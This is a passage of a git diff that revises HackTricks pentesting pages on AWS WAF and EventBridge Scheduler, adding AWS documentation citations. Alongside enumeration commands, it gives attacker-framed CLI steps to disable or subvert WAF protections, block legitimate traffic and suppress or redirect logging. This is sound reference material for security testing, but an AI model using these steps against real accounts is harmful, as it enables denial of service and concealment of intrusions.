+Each rule group has an associated **capacity** in web ACL capacity units (WCUs), which AWS WAF uses to calculate and control the operating resources required to run rules, rule groups, and web ACLs. The capacity is fixed when the rule group is created.<sup>[[5]](#references)</sup>
 
 #### Rule
 
-A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules:
+A rule defines how AWS WAF inspects incoming web requests and what action it takes when the inspection criteria match. Common rules use request criteria directly, while rate-based rules add request-rate aggregation:<sup>[[2]](#references)</sup>
 
-1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests.
-2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**.
+- **Regular Rule**: Uses specified inspection criteria to determine whether to allow, block, count, CAPTCHA, or challenge web requests.
+- **Rate-Based Rule**: Counts matching requests by an aggregation key (often source IP) over a configurable evaluation window. The default window is five minutes, and the minimum rate limit is **10 requests**; when the limit is exceeded, the rule action is applied to matching requests.<sup>[[9]](#references)</sup>
 
 #### Managed Rules
 
-AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities.
+AWS WAF offers pre-configured managed rule groups that are maintained by AWS, AWS Marketplace sellers, or other AWS services. They provide reusable protection against common threats.<sup>[[5]](#references)</sup>
 
 #### IP Set
 
-An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules.
+An IP Set is a list of IP addresses or IP address ranges that you can reference from rules to allow or block traffic. IP sets simplify the process of managing IP-based rules.<sup>[[14]](#references)</sup>
 
 #### Regex Pattern Set
 
-A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters.
+A Regex Pattern Set contains regular expressions that rules can reference when matching web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters.<sup>[[14]](#references)</sup>
 
 #### Lock Token
 
-A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously.
+A Lock Token provides optimistic locking when updating or deleting WAF resources. AWS WAF returns the token from get and list operations and rejects a change if the resource changed since the token was obtained.<sup>[[16]](#references)</sup>
 
 #### API Keys
 
-API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations.
+AWS WAF API keys are encrypted keys used by the JavaScript CAPTCHA integration to verify that a client domain is authorized to use the CAPTCHA API.<sup>[[13]](#references)</sup>
 
 - **Example**: Integration of the CAPTCHA API.
 
 #### Permission Policy
 
-A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations.
+A permission policy in AWS WAF is an IAM policy attached to a rule group to share that rule group with other accounts. Separately, identity-based IAM policies grant principals permission to call AWS WAF APIs.<sup>[[1]](#references)[[15]](#references)</sup>
 
 #### Scope
 
-The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution.
+The scope parameter in AWS WAF specifies whether the WAF resources apply to regional resources or a global resource such as an Amazon CloudFront distribution.<sup>[[3]](#references)</sup>
 
-- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located.
-- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served.
+- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service, and AWS Verified Access instance. You specify the AWS Region where these resources are located.<sup>[[3]](#references)</sup>
+- **CLOUDFRONT**: Applies to Amazon CloudFront distributions and AWS Amplify applications. WAF configurations for these global resources are managed through the `us-east-1` Region regardless of where the content is served.<sup>[[3]](#references)[[10]](#references)</sup>
 
 ### Key features
 
-#### Monitoring Criteria (Conditions)
+#### Monitoring Criteria (Rule Statements)
 
-**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**.
+Rule statements specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, including XSS, geographical location, IP addresses, size constraints, SQL injection, and string or regex patterns. CloudFront geographic restrictions are a separate edge-level control that returns `403` for disallowed countries, so those requests are not evaluated by WAF.<sup>[[2]](#references)[[17]](#references)</sup>
 
-Each AWS account can configure:
+Current default quotas include the following.<sup>[[4]](#references)</sup>
 
-- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased).
-- **100 rules** and **50 Web ACLs**.
-- A maximum of **5 rate-based rules**.
-- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer.
+- **100 protection packs (Web ACLs)**, **100 rule groups**, and **100 IP sets** per account per Region
+- **10 regex pattern sets** per account per Region
+- **10 rate-based rules** per protection pack (Web ACL), with a minimum rate limit of **10 requests**
+- **100,000 requests per second** per protection pack (Web ACL); CloudFront RPS limits are set by CloudFront
 
 #### Rule actions
 
-Actions are assigned to each rule, with options being:
+AWS documents the following rule actions.<sup>[[6]](#references)</sup>
 
-- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer.
-- **Block**: The request is terminated immediately.
-- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block.
-- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges.
+- **Allow**: Stops WAF evaluation and allows the request to continue to the protected resource.
+- **Block**: Stops WAF evaluation and prevents the protected resource from receiving the request.
+- **Count**: Tallies matching requests while allowing evaluation to continue; this is useful for testing a rule before setting it to Allow or Block.
+- **CAPTCHA and Challenge:** Checks the request token and either continues evaluation for a valid token or presents a CAPTCHA puzzle or silent challenge.
 
-If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence:
+If no rule produces a terminating action, the Web ACL applies its **default action** (Allow or Block). AWS WAF evaluates rules from the lowest numeric priority to the highest, so a common layout is:<sup>[[6]](#references)[[7]](#references)</sup>
 
 1. Allow Whitelisted IPs.
 2. Block Blacklisted IPs.
@@ -88,18 +86,20 @@ If a request doesn't match any rule within the Web ACL, it undergoes the **defau
 
 #### CloudWatch Integration
 
-AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks.
+AWS WAF integrates with CloudWatch for monitoring, offering metrics such as `AllowedRequests`, `BlockedRequests`, `CountedRequests`, and `PassedRequests`. AWS WAF reports these metrics once a minute.<sup>[[8]](#references)</sup>
 
 ### Enumeration
 
-In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia):
+To interact with CloudFront distributions, specify the US East (N. Virginia) Region:
 
-- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` .
-- API and SDKs - For all calls, use the Region endpoint us-east-1.
+- CLI - Specify the US East Region when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1`.<sup>[[10]](#references)</sup>
+- API and SDKs - For all calls, use the `us-east-1` Region endpoint.<sup>[[3]](#references)[[10]](#references)</sup>
 
 In order to interact with regional services, you should specify the region:
 
-- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2`
+- Example with the Europe (Spain) Region: `--scope REGIONAL --region=eu-south-2`<sup>[[3]](#references)</sup>
+
+The following AWS CLI commands cover common AWS WAFv2 enumeration operations. For resource-specific dependent permissions, consult the AWS WAFv2 Service Authorization Reference.<sup>[[1]](#references)[[10]](#references)</sup>
 
 ```bash
 # Web ACLs #
@@ -110,9 +110,9 @@ aws wafv2 list-web-acls --scope <REGIONAL --region=<value> | CLOUDFRONT --region
 aws wafv2 get-web-acl --name <value> --id <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 
 ## Retrieve a list of resources associated with a specific web access control list (Web ACL)
-aws wafv2 list-resources-for-web-acl --web-acl-arn <value> # Additional permissions needed depending on the protected resource type: cognito-idp:ListResourcesForWebACL, ec2:DescribeVerifiedAccessInstanceWebAclAssociations or apprunner:ListAssociatedServicesForWebAcl
+aws wafv2 list-resources-for-web-acl --web-acl-arn <value>
 ## Retrieve the Web ACL associated with the specified AWS resource
-aws wafv2 get-web-acl-for-resource --resource-arn <arn> # Additional permissions needed depending on the protected resource type: cognito-idp:GetWebACLForResource, ec2:GetVerifiedAccessInstanceWebAcl, wafv2:GetWebACL or apprunner:DescribeWebAclForService
+aws wafv2 get-web-acl-for-resource --resource-arn <arn>
 
 # Rule groups #
 
@@ -121,7 +121,7 @@ aws wafv2 list-rule-groups --scope <REGIONAL --region=<value> | CLOUDFRONT --reg
 ## Retrieve the details of a specific rule group
 aws wafv2 get-rule-group [--name <value>] [--id <value>] [--arn <value>] [--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>]
 ## Retrieve the IAM policy attached to the specified rule group
-aws wafv2 get-permission-policy --resource-arn <rule-group-arn> # Just the owner of the Rule Group can do this operation
+aws wafv2 get-permission-policy --resource-arn <rule-group-arn>
 
 # Managed rule groups (by AWS or by a third-party) #
 
@@ -170,7 +170,7 @@ aws wafv2 get-logging-configuration --resource-arn <value> [--log-scope <CUSTOME
 # Miscelaneous #
 
 ## Retrieve a list of the tags associated to the specified resource
-aws wafv2 list-tags-for-resource resource-arn <value>
+aws wafv2 list-tags-for-resource --resource-arn <value>
 
 ## Retrieve a sample of web requests that match a specified rule within a WebACL during a specified time range
 aws wafv2 get-sampled-requests --web-acl-arn <value> --rule-metric-name <value> --time-window <value> --max-items <1-500> --scope <value>
@@ -192,11 +192,11 @@ aws wafv2 get-mobile-sdk-release --platform <value> --release-version <value>
 >
 > However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF.
 
-In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource.
+Many Delete and Update operations require a **lock token**. This token provides optimistic concurrency control; obtain the current token from the relevant **list** or **get** operation before changing the resource.<sup>[[16]](#references)</sup>
 
 #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`**
 
-An attacker would be able to compromise the security of the affected resource by:
+The listed permissions can create, update, or delete a rule group.<sup>[[1]](#references)</sup> An attacker would be able to compromise the security of the affected resource by:
 
 - Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service.
 - Updating rule groups, being able to modify its actions for example from **Block** to **Allow**.
@@ -213,7 +213,7 @@ aws wafv2 update-rule-group --name <value> --id <value> --visibility-config <val
 aws wafv2 delete-rule-group --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ```
 
-The following examples shows a rule group that would block legitimate traffic from specific IP addresses:
+The following example creates a rule group that blocks legitimate traffic from specific IP addresses.<sup>[[5]](#references)</sup>
 
 ```bash
 aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json
@@ -247,14 +247,14 @@ The **rule.json** file would look like:
 
 #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`**
 
-With these permissions, an attacker would be able to:
+These permissions can create, update, or delete a Web ACL.<sup>[[1]](#references)</sup> An attacker would be able to:
 
 - Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service.
 - Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests.
 - Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks.
 
 > [!NOTE]
-> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false.
+> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false, and you must first disassociate it from all resources.<sup>[[16]](#references)</sup>
 
 ```bash
 # Create Web ACL
@@ -313,9 +313,9 @@ The following examples shows how to update a Web ACL to block the legitimate tra
 }
 ```
 
-Command to update the Web ACL:
+Command to update the Web ACL (the `update-web-acl` operation replaces the Web ACL rule configuration):<sup>[[10]](#references)</sup>
 
-```json
+```bash
 aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1
 ```
 
@@ -347,23 +347,21 @@ The **rule.json** file would look like:
 
 #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`**
 
-The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection.
+The **`wafv2:AssociateWebACL`** permission allows an identity to associate a web ACL with a supported application resource, while **`wafv2:DisassociateWebACL`** removes that association. An attacker with these permissions could bypass or disable security controls, potentially exposing the application to exploits such as SQL injection or cross-site scripting (XSS).<sup>[[1]](#references)</sup>
 
-The additional permissions would be needed depending on the protected resource type:
+The current service-authorization mapping lists these dependent permissions for API Gateway, AppSync, and Application Load Balancers:<sup>[[1]](#references)</sup>
 
 - **Associate**
   - apigateway:SetWebACL
-  - apprunner:AssociateWebAcl
+  - appsync:AssociateWebACL
   - appsync:SetWebACL
-  - cognito-idp:AssociateWebACL
-  - ec2:AssociateVerifiedAccessInstanceWebAcl
+  - elasticloadbalancing:CreateWebACLAssociation
   - elasticloadbalancing:SetWebAcl
 - **Disassociate**
   - apigateway:SetWebACL
-  - apprunner:DisassociateWebAcl
+  - appsync:DisassociateWebACL
   - appsync:SetWebACL
-  - cognito-idp:DisassociateWebACL
-  - ec2:DisassociateVerifiedAccessInstanceWebAcl
+  - elasticloadbalancing:DeleteWebACLAssociation
   - elasticloadbalancing:SetWebAcl
 
 ```bash
@@ -377,7 +375,7 @@ aws wafv2 disassociate-web-acl --resource-arn <value>
 
 #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`**
 
-An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources.
+The listed permissions can create, update, or delete the IP sets managed by AWS WAF.<sup>[[1]](#references)</sup> This could be dangerous because an attacker could create new IP sets to allow malicious traffic, modify IP sets to block legitimate traffic, add malicious IP addresses to existing sets, remove trusted addresses, or delete critical IP sets.<sup>[[14]](#references)</sup>
 
 ```bash
 # Create IP set
@@ -398,11 +396,11 @@ aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a
 
 #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`**
 
-An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns.
+The listed permissions can manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic.<sup>[[1]](#references)[[14]](#references)</sup>
 
-- Creating new regex patterns would help an attacker to allow harmful content
-- Updating the existing patterns, an attacker would to bypass security rules
-- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures.
+- Creating new regex patterns could allow harmful content.
+- Updating existing patterns could bypass security rules.
+- Deleting patterns designed to block malicious activity could let malicious payloads reach protected resources.
 
 ```bash
 # Create regex pattern set
@@ -415,18 +413,18 @@ aws wafv2 delete-regex-pattern-set --name <value> --scope <REGIONAL --region=<va
 
 **Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF.
 
-#### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`**
+#### **(`wafv2:PutLoggingConfiguration` & `iam:CreateServiceLinkedRole`), `wafv2:DeleteLoggingConfiguration`**
 
-An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control.
+The **`wafv2:DeleteLoggingConfiguration`** permission removes logging from a Web ACL, while **`wafv2:PutLoggingConfiguration`** enables or replaces the configuration. Initial configuration can also require **`iam:CreateServiceLinkedRole`** when AWS WAF needs its service-linked role, notably for Amazon Data Firehose delivery. An attacker with these permissions could suppress logging or redirect it to an unauthorized destination.<sup>[[1]](#references)[[11]](#references)[[12]](#references)</sup>
 
-During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination:
+During the creation process, the service automatically sets up the necessary permissions for the selected logging destination.<sup>[[11]](#references)[[12]](#references)</sup>
 
 - **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group.
 - **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket.
-- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream.
+- **Amazon Data Firehose:** AWS WAF creates a service-linked role for interacting with Firehose. This role allows AWS WAF to deliver logs to the configured delivery stream.
 
 > [!NOTE]
-> It is possible to define only one logging destination per web ACL.
+> It is possible to define only one logging destination per web ACL.<sup>[[11]](#references)</sup>
 
 ```bash
 # Put logging configuration
@@ -435,11 +433,11 @@ aws wafv2 put-logging-configuration --logging-configuration <value>
 aws wafv2 delete-logging-configuration --resource-arn <value> [--log-scope <CUSTOMER | SECURITY_LAKE>] [--log-type <value>]
 ```
 
-**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments.
+**Potential Impact:** Obscured visibility into security events can hinder incident response and facilitate covert malicious activity within AWS WAF-protected environments.
 
 #### **`wafv2:DeleteAPIKey`**
 
-An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource.
+The **`wafv2:DeleteAPIKey`** permission can delete existing API keys, which can disrupt JavaScript CAPTCHA integrations and the application functionality that depends on them.<sup>[[1]](#references)[[13]](#references)</sup>
 
 ```bash
 # Delete API key
@@ -450,7 +448,7 @@ aws wafv2 delete-api-key --api-key <value> --scope <REGIONAL --region=<value> | 
 
 #### **`wafv2:TagResource`, `wafv2:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations.
+The **`wafv2:TagResource`** and **`wafv2:UntagResource`** permissions can add or remove tags from AWS WAFv2 resources, including Web ACLs, rule groups, IP sets, and regex pattern sets.<sup>[[1]](#references)</sup>
 
 ```bash
 # Tag
@@ -463,10 +461,24 @@ aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
 
 ## References
 
-- [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/)
-- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html)
+- [1] [Actions, resources, and condition keys for AWS WAF V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_wafv2.html)
+- [2] [What is AWS WAF?](https://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html)
+- [3] [Resources that you can protect with AWS WAF](https://docs.aws.amazon.com/waf/latest/developerguide/how-aws-waf-works-resources.html)
+- [4] [AWS WAF quotas](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)
+- [5] [AWS WAF rule groups](https://docs.aws.amazon.com/waf/latest/developerguide/waf-rule-groups.html)
+- [6] [How AWS WAF handles rule and rule group actions](https://docs.aws.amazon.com/waf/latest/developerguide/web-acl-rule-actions.html)
+- [7] [Setting rule priority](https://docs.aws.amazon.com/waf/latest/developerguide/web-acl-processing-order.html)
+- [8] [AWS WAF metrics and dimensions](https://docs.aws.amazon.com/waf/latest/developerguide/waf-metrics.html)
+- [9] [Rate-based rule high-level settings in AWS WAF](https://docs.aws.amazon.com/waf/latest/developerguide/waf-rule-statement-type-rate-based-high-level-settings.html)
+- [10] [wafv2 — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/wafv2/)
+- [11] [LoggingConfiguration - AWS WAFV2](https://docs.aws.amazon.com/waf/latest/APIReference/API_LoggingConfiguration.html)
+- [12] [Using service-linked roles for AWS WAF](https://docs.aws.amazon.com/waf/latest/developerguide/using-service-linked-roles.html)
+- [13] [Managing API keys for the JS CAPTCHA API](https://docs.aws.amazon.com/waf/latest/developerguide/waf-js-captcha-api-key.html)
+- [14] [IP sets and regex pattern sets in AWS WAF](https://docs.aws.amazon.com/waf/latest/developerguide/waf-referenced-set-managing.html)
+- [15] [Sharing a rule group](https://docs.aws.amazon.com/waf/latest/developerguide/waf-rule-group-sharing.html)
+- [16] [DeleteWebACL - AWS WAFV2](https://docs.aws.amazon.com/waf/latest/APIReference/API_DeleteWebACL.html)
+- [17] [Restrict the geographic distribution of your content](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html)
+- [18] [AWS Web Application Firewall (WAF) - Citrus Consulting](https://www.citrusconsulting.com/aws-web-application-firewall-waf/)
+- [19] [Actions, resources, and condition keys for AWS WAF V2 - legacy URL](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -1,31 +1,29 @@
 # AWS - EventBridge Scheduler Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## EventBridge Scheduler
 
-**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
+**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.<sup>[[1]](#references)</sup>
 
-There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."
+The default quota is 10,000,000 schedules per account per Region. Completed one-time schedules continue to count against this quota, so AWS recommends configuring schedules to delete themselves after completion.<sup>[[2]](#references)</sup>
 
 ### Types of Schedules
 
-Types of Schedules in EventBridge Scheduler:
+EventBridge Scheduler supports three schedule types: rate-based, cron-based, and one-time schedules.<sup>[[3]](#references)</sup>
 
-1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
-2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
-3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
+1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.<sup>[[3]](#references)</sup>
+2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.<sup>[[3]](#references)</sup>
+3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.<sup>[[3]](#references)</sup>
 
-Two Mechanisms for Handling Failed Events:
+EventBridge Scheduler provides two mechanisms for handling failed events:<sup>[[4]](#references)</sup>
 
-1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
-2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
+1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.<sup>[[4]](#references)</sup>
+2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.<sup>[[4]](#references)</sup>
 
 ### Targets
 
-There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API.
+There are two types of targets for a scheduler: [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which provide common API operations, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can invoke a wider set of API operations across AWS services.<sup>[[5]](#references)[[6]](#references)</sup>
 
-**Templated targets** support the following services:
+**Templated targets** support the following services:<sup>[[5]](#references)</sup>
 
 - CodeBuild – StartBuild
 - CodePipeline – StartPipelineExecution
@@ -38,7 +36,7 @@ There are 2 types of targets for a scheduler [**templated (docs)**](https://docs
   - Parameters: KinesisParameters
 - Firehose – PutRecord
 - Lambda – Invoke
-- SageMaker – StartPipelineExecution
+- SageMaker AI – StartPipelineExecution
   - Parameters: SageMakerPipelineParameters
 - Amazon SNS – Publish
 - Amazon SQS – SendMessage
@@ -46,6 +44,8 @@ There are 2 types of targets for a scheduler [**templated (docs)**](https://docs
 - Step Functions – StartExecution
 
 ### Enumeration
+
+The following AWS CLI commands list schedules and schedule groups, retrieve schedule and group details, and list tags for a Scheduler resource.<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 # List all EventBridge Scheduler schedules
@@ -60,7 +60,7 @@ aws scheduler get-schedule --name <schedule_name>
 # Describe a specific schedule group
 aws scheduler get-schedule-group --name <group_name>
 
-# List tags for a specific schedule (helpful in identifying any custom tags or permissions)
+# List tags for a schedule group (helpful in identifying any custom tags or permissions)
 aws scheduler list-tags-for-resource --resource-arn <schedule_group_arn>
 ```
 
@@ -74,9 +74,16 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
 
 ## References
 
-- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
+- [1] [What is Amazon EventBridge Scheduler?](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
+- [2] [Quotas for Amazon EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/scheduler-quotas.html)
+- [3] [Schedule types in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/schedule-types.html)
+- [4] [Managing a schedule in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-schedule.html)
+- [5] [Using templated targets in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
+- [6] [Using universal targets in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
+- [7] [AWS CLI `list-schedules` command reference](https://docs.aws.amazon.com/cli/latest/reference/scheduler/list-schedules.html)
+- [8] [AWS CLI `list-schedule-groups` command reference](https://docs.aws.amazon.com/cli/latest/reference/scheduler/list-schedule-groups.html)
+- [9] [AWS CLI `get-schedule` command reference](https://docs.aws.amazon.com/cli/latest/reference/scheduler/get-schedule.html)
+- [10] [AWS CLI `get-schedule-group` command reference](https://docs.aws.amazon.com/cli/latest/reference/scheduler/get-schedule-group.html)
+- [11] [AWS CLI `list-tags-for-resource` command reference](https://docs.aws.amazon.com/cli/latest/reference/scheduler/list-tags-for-resource.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-


### PR DESCRIPTION
Audits SUMMARY positions 351-400.

